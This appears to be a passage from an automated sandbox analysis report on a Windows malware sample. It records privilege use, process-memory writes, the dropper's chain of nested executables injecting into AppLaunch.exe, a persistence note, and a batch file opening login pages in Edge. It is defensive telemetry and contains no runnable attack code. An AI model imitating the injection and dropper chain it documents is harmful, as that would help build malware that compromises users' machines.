Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8FD9.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\kos.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\PA Previewer\previewer.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2084 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\f6cbadd1b54e99b4555c3db5566df1c4a0fb50ef8b198e020126ce8006dd6b66_JC.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v8598647.exe
PID 2084 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\f6cbadd1b54e99b4555c3db5566df1c4a0fb50ef8b198e020126ce8006dd6b66_JC.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v8598647.exe
PID 2084 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\f6cbadd1b54e99b4555c3db5566df1c4a0fb50ef8b198e020126ce8006dd6b66_JC.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v8598647.exe
PID 4956 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v8598647.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v2484984.exe
PID 4956 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v8598647.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v2484984.exe
PID 4956 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v8598647.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v2484984.exe
PID 3360 wrote to memory of 3412 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v2484984.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe
PID 3360 wrote to memory of 3412 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v2484984.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe
PID 3360 wrote to memory of 3412 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v2484984.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe
PID 3412 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3412 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3412 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3412 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3412 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3412 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3360 wrote to memory of 4868 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v2484984.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\b8626230.exe
PID 3360 wrote to memory of 4868 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v2484984.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\b8626230.exe
PID 3360 wrote to memory of 4868 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v2484984.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\b8626230.exe
PID 4868 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\b8626230.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4868 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\b8626230.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4868 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\b8626230.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4868 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\b8626230.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4868 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\b8626230.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4868 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\b8626230.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4868 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\b8626230.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4868 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\b8626230.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4956 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v8598647.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\d3353339.exe
PID 4956 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v8598647.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\d3353339.exe
PID 4956 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v8598647.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\d3353339.exe
PID 2372 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\d3353339.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2372 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\d3353339.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2372 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\d3353339.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2372 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\d3353339.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2372 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\d3353339.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2372 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\d3353339.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2372 wrote to memory of 4176 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\d3353339.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2372 wrote to memory of 4176 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\d3353339.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2372 wrote to memory of 4176 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\d3353339.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2372 wrote to memory of 4176 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\d3353339.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2372 wrote to memory of 4176 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\d3353339.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2372 wrote to memory of 4176 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\d3353339.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2372 wrote to memory of 4176 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\d3353339.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2372 wrote to memory of 4176 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\d3353339.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2084 wrote to memory of 916 N/A C:\Users\Admin\AppData\Local\Temp\f6cbadd1b54e99b4555c3db5566df1c4a0fb50ef8b198e020126ce8006dd6b66_JC.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\e5928733.exe
PID 2084 wrote to memory of 916 N/A C:\Users\Admin\AppData\Local\Temp\f6cbadd1b54e99b4555c3db5566df1c4a0fb50ef8b198e020126ce8006dd6b66_JC.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\e5928733.exe
PID 2084 wrote to memory of 916 N/A C:\Users\Admin\AppData\Local\Temp\f6cbadd1b54e99b4555c3db5566df1c4a0fb50ef8b198e020126ce8006dd6b66_JC.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\e5928733.exe
PID 3180 wrote to memory of 1772 N/A N/A C:\Windows\system32\cmd.exe
PID 3180 wrote to memory of 1772 N/A N/A C:\Windows\system32\cmd.exe
PID 1772 wrote to memory of 1120 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1772 wrote to memory of 1120 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1120 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1120 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1772 wrote to memory of 4216 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1772 wrote to memory of 4216 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4216 wrote to memory of 1008 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4216 wrote to memory of 1008 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1120 wrote to memory of 4908 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1120 wrote to memory of 4908 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1120 wrote to memory of 4908 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1120 wrote to memory of 4908 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1120 wrote to memory of 4908 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1120 wrote to memory of 4908 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1120 wrote to memory of 4908 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1120 wrote to memory of 4908 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\f6cbadd1b54e99b4555c3db5566df1c4a0fb50ef8b198e020126ce8006dd6b66_JC.exe

"C:\Users\Admin\AppData\Local\Temp\f6cbadd1b54e99b4555c3db5566df1c4a0fb50ef8b198e020126ce8006dd6b66_JC.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v8598647.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v8598647.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v2484984.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v2484984.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3412 -ip 3412

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3412 -s 140

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\b8626230.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\b8626230.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4868 -ip 4868

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4868 -s 580

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\d3353339.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\d3353339.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2372 -ip 2372

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2372 -s 580

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\e5928733.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\e5928733.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\847D.bat" "

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa53de46f8,0x7ffa53de4708,0x7ffa53de4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa53de46f8,0x7ffa53de4708,0x7ffa53de4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1956,9364587754675404049,11013315645749529256,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1956,9364587754675404049,11013315645749529256,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1956,9364587754675404049,11013315645749529256,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2724 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,9364587754675404049,11013315645749529256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,10324306085338314856,1080225104958511414,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,10324306085338314856,1080225104958511414,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,9364587754675404049,11013315645749529256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\8C3E.exe

C:\Users\Admin\AppData\Local\Temp\8C3E.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,9364587754675404049,11013315645749529256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3944 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\8FD9.exe

C:\Users\Admin\AppData\Local\Temp\8FD9.exe

C:\Users\Admin\AppData\Local\Temp\ss41.exe

"C:\Users\Admin\AppData\Local\Temp\ss41.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\9604.exe

C:\Users\Admin\AppData\Local\Temp\9604.exe

C:\Users\Admin\AppData\Local\Temp\kos1.exe

"C:\Users\Admin\AppData\Local\Temp\kos1.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"

C:\Users\Admin\AppData\Local\Temp\A6FD.exe

C:\Users\Admin\AppData\Local\Temp\A6FD.exe

C:\Users\Admin\AppData\Local\Temp\set16.exe

"C:\Users\Admin\AppData\Local\Temp\set16.exe"

C:\Users\Admin\AppData\Local\Temp\kos.exe

"C:\Users\Admin\AppData\Local\Temp\kos.exe"

C:\Users\Admin\AppData\Local\Temp\is-VTMP5.tmp\is-ERTP0.tmp

"C:\Users\Admin\AppData\Local\Temp\is-VTMP5.tmp\is-ERTP0.tmp" /SL4 $170064 "C:\Users\Admin\AppData\Local\Temp\set16.exe" 1232936 52224

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,9364587754675404049,11013315645749529256,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

